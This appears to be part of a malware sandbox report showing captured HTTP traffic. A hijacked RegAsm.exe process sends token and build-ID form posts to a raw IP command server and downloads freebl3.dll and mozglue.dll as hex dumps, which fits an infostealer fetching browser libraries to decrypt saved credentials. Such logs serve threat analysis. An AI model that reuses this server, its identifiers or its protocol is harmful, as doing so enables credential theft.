                                                                                                                                                                                                                                2024-09-21 11:35:00 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------FHCAEGCBFHJDGCBFHDAFContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------FHCAEGCBFHJDGCBFHDAFCont
                                                                                                                                                                                                                                2024-09-21 11:35:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:01 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.2.949773116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:01 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJ
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:01 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------JKKEHJDHJKFIECAAKFIJCont
                                                                                                                                                                                                                                2024-09-21 11:35:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:02 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                19192.168.2.949774116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:04 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFC
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:04 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 45 47 48 4a 45 47 49 44 47 43 41 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 31 65 34 66 32 38 61 30 64 66 38 35 38 37 32 30 63 32 65 64 34 30 38 39 35 35 34 38 63 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 45 47 48 4a 45 47 49 44 47 43 41 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 45 47 48 4a 45 47 49 44 47 43 41 46 42 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                Data Ascii: ------EGDGIEGHJEGIDGCAFBFCContent-Disposition: form-data; name="token"991e4f28a0df858720c2ed40895548c7------EGDGIEGHJEGIDGCAFBFCContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------EGDGIEGHJEGIDGCAFBFCCont
                                                                                                                                                                                                                                2024-09-21 11:35:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:05 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-21 11:35:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                20192.168.2.949775116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC199OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:06 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:35:06 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                                                                                                                                Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                                                                                                                                Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                                                                                                                                Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                                                                                                                                Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                                                                                                                                Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                                                                                                                                Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                                                                                                                                Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                                                                                                                                Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                                                2024-09-21 11:35:06 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                                                                                                                                Data Ascii: ,0<48%8A)$


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                21192.168.2.949777116.203.165.1274435752C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC199OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                Host: 116.203.165.127
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:35:08 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 608080
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Last-Modified: Saturday, 21-Sep-2024 11:35:08 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                                                                                                                                Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                                                                                                                                2024-09-21 11:35:08 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                                                                                                                                Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
